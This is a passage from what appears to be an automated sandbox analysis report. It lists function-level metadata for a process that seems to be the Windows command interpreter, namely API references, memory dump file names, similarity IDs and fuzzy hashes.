                                                                                                                                                                                                                                                                                                                                                                                                                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D153D17A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D18C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3008996577-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: d465b0f99f4f56d245c3ee9c3945008db0e88f480d9dc2bc0b6af22e40127ff8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3210726A146568AF740AB71E8000BDB7B0FB49B44BD45136EE0E53B68EF7C90418B64
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1535770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1078844751-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0d07a965f8815432f52e2bff00b6c71de3ad0b6e3a8b1a63bf147fccd806d5ac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7351D962B2968B86FF12AF5484542BDE290AF84790FE45436DA4F077A0DF7CF505C320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7D153B934
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7D1525085), ref: 00007FF7D153B9A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7D1525085), ref: 00007FF7D153B9F7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %WINDOWS_COPYRIGHT%
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1103618819-1745581171
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 82eb304367896b4d30f2a06bee52ef175eeed96ffc9d9c1b65229b5131547255
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83418266A0C78B82FB10AF15941027DB3A0FB59B90FD55236DA8E433A5EFBCE585C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1540774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca8e2a1b414ea380d711f9c454c4aa0e55d4a13fba3e59700edb5f751f05f94b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA317932705B8A85FB21AB22D8503EDA7A0FB89B88F954136DA4E47B65DF7CD2458310
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15232E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15233A8: iswspace.MSVCRT(?,?,00000000,00007FF7D153D6EE,?,?,?,00007FF7D1530632), ref: 00007FF7D15233C0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iswspace.MSVCRT(?,?,?,00007FF7D15232A4), ref: 00007FF7D152331C
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: off
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2389812497-733764931
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: beb9a02507d0020e5df83b13a7ad2f7702788e55974cf8f532388b0e0054dcac
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF219222E0C65B81FBA07B15941027DE690EF59B80FD88076DA4F8B7A4DEECE540D321
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s$DPATH$PATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3731854180-3148396303
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 62ed8453b084583fac42654c7a84691a1a7561437b2953b65109ce16d138c36b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B521BBA2B0965B80FF50AB55E4402BDE2A0AF81B80FD89137C90F437B5DEBCE4448360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1528198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcscmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: *.*$????????.???
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3392835482-3870530610
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: cab2b395ec11626ea7e23074bb7efcf89a5e0a09d5558e18932e05e7277afa1c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B611C626B14A6B41F764AB16A44013DB2E0FB44B80FD850B2CE4E87BA9DFBDE4418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1539114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: fprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 383729395-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 38ad5b02cc2252f43376ad96edbad080f36ae9244483b0fe974c493cedd0b9ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B711BF6290864B81FB65AB14E9001BDA260EB457B0FD04337DA7F532F4EFACE8418390
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15209F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 287713880-1183017076
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 263d6c7b004025f4b2a309db29ad57c0471cf254085b515d9731592ce87fb08f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CF04422E1A65B81FB649B81E40027EEAA0FF44F40FD59372D95F82674EFBCD480C620
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15204F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1646373207-2530943252
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 04eceb11c5e6a44ba6dce340976ddb83671508925d267d7f94f2972208a5cdf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5010821A0AA0FC1FB44AB11E85123CA2A0AF49730FD40377D92F427F0DEFCA5818320
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15373C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
